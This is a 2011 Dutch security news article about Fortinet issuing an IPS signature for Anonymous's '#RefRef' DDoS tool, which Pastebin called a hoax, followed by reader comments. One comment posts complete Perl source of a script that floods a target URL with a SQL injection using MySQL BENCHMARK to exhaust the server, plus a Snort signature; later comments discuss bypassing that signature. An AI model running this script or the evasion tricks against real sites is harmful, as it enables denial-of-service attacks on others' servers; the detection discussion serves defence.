Nieuws
image

Beveiligingsbedrijf trapt in Anonymous hoax

dinsdag 4 oktober 2011, 12:02 door Redactie, 8 reacties

Beveiligingsbedrijf Fortinet heeft een update uitgebracht voor een niet-bestaand "wapen" van internetbeweging Anonymous. Begin augustus kondigde Anonymous een nieuw DDoS-kanon aan, waarmee het probleemloos en zonder veel bandbreedte websites kon platleggen. Als bewijs werd dumpsite Pastebin.com korte tijd platgelegd. De tool zelf zou in september verschijnen.

Twee weken geleden verklaarde Pastebin dat de website niet door de #RefRef tool getroffen was en dat deze magische DDoS-tool een hoax zou zijn. "Het was niet hun magische tool, maar iets anders. Wat precies weten we nog niet. De grafieken die we op Twitter plaatsten waren echt, wat ook geldt voor de 42 minuten downtime", aldus Pastebin via Twitter. Ook via een ander Twitter-account werd gemeld dat #RefRef nooit heeft bestaan.

Hoax
De boodschap lijkt niet bij Fortinet te zijn aangekomen: "Anonymous’ #RefRef is van een andere orde dan hun Apache Killer en Low Orbit Ion Cannon (LOIC)", zegt security strateeg Derek Manky. De tool zou speciaal ontwikkeld zijn om SQL server kwetsbaarheden van financiële en overheidsinstellingen te misbruiken. De Apache killer-tool werd nooit door Anonymous ontwikkeld, maar door beveiligingsonderzoeker Kingcope.

"In tegenstelling tot LOIC, die vereist dat meerdere gebruikers tegelijkertijd een site onder vuur nemen met een constante bombardement van TCP-en UDP-pakketten, kan #RefRef enorme schade toebrengen met een enkele aanval. Eenmaal binnen bij het doelwit met een kwetsbaar systeem, gebruikt de software in feite de processing kracht van het systeem zelf, tegen zichzelf, zodat uiteindelijk crasht", gaat Manky verder. Als oplossing kwam de beveiliger met een speciale IPS-handtekening

WikiLeaks
Het bedrijf ziet ook een relatie tussen Anonymous en WikiLeaks-oprichter Julian Assange. "Anonymous, wereldwijd bekend vanwege haar WikiLeaks directeur Julian Assange, was betrokken bij de distributed denial of service-aanvallen (DDoS) tegen o.a. PayPal, MasterCard en Visa", aldus Fortinet.

Reacties (8)
04-10-2011, 12:59 door Anoniem
De signature is nuttig. Dat het script geen RefRef is maar in werkelijkheid de SQLi injection DDoS doet weinig af aan het feit dat men met dit script aanvallen kan uitvoeren, en dat je je er tegen kunt beschermen. De informatie is dus goed, al klopt de bijgevoegde uitleg niet geheel.

SOURCECODE

#!usr/bin/perl
#RefRef (C) Anonymous 2011

use LWP::UserAgent;

my $nave = LWP::UserAgent->new;
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
$nave->timeout(5);

head();
if($ARGV[0]) {
now($ARGV[0]);
} else {
sintax();
}
copyright();

sub now {
print "\n[+] Target : ".$_[0]."\n";
print "\n[+] Starting the attack\n[+] Info : control+c for stop attack\n\n";
while(true) {
$SIG{INT} = \&adios;
$code = toma($_[0]." and (select+benchmark(99999999999,0x70726f62616e646f70726f62616e646f70726f62616e646f))");
unless($code->is_success) {
print "[+] Web Off\n";
copyright();
}}}

sub adios {
print "\n[+] Stoping attack\n";
copyright();
}

sub head {
print "\n\n-- == #RefRef == --\n\n";
}

sub copyright {
print "\n\n-- == RefRef == --\n\n";
exit(1);
}

sub sintax {
print "\n[+] Sintax : $0 \n";
}

sub toma {
return $nave->get($_[0]);
}

# ¿ The End ?

IDS SIGNATURE

alert tcp any any <> any any (msg:"SQLi Injection DDoS Hash Detected"; content:"|70 72 6f 62 61 6e 64 6f 70 72 6f 62 61 6e 64 6f 70 72 6f 62 61 6e 64 6f|"; sid:999999999; rev:1;)
04-10-2011, 13:18 door Anoniem
Trust nobody, Mulder!
04-10-2011, 15:14 door Anoniem
ook pastebin.com aanvallen? wat hebben die nou weer misdaan?
hoor graag een leuk excuus voor deze aanval =D
04-10-2011, 15:44 door choi
Anonymous, wereldwijd bekend vanwege haar WikiLeaks directeur Julian Assange..

Huh?
04-10-2011, 15:46 door SirDice
Door Anoniem: alert tcp any any <> any any (msg:"SQLi Injection DDoS Hash Detected"; content:"|70 72 6f 62 61 6e 64 6f 70 72 6f 62 61 6e 64 6f 70 72 6f 62 61 6e 64 6f|"; sid:999999999; rev:1;)
Leuke signature maar als ik SELECT BENCHMARK wat andere parameters geef wordt het niet meer gedetecteerd. Je kunt m.i. beter op die "select+benchmark" controleren. Je wilt sowieso niet dat dat geïnjecteerd wordt.
04-10-2011, 18:10 door spatieman
het klopt !!
zelf mijn telefoon met GPRS linkje heeft deze site al plat weten te leggen.
04-10-2011, 23:38 door Anoniem
Je gaat het uberhaupt nooit goed filteren. SEL/* DIT MAG GEWOON*/ECT BENCHMARK
05-10-2011, 10:44 door SirDice
Door Anoniem: Je gaat het uberhaupt nooit goed filteren. SEL/* DIT MAG GEWOON*/ECT BENCHMARK
Niet echt.

mysql> select 1;
+---+
| 1 |
+---+
| 1 |
+---+
1 row in set (0.00 sec)

mysql> sel/*test*/ect 1;
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'sel ect 1' at line 1

Wat wel mag is "SELECT/**/BENCHMARK".
Reageren

Deze posting is gelocked. Reageren is niet meer mogelijk.

Zoeken
search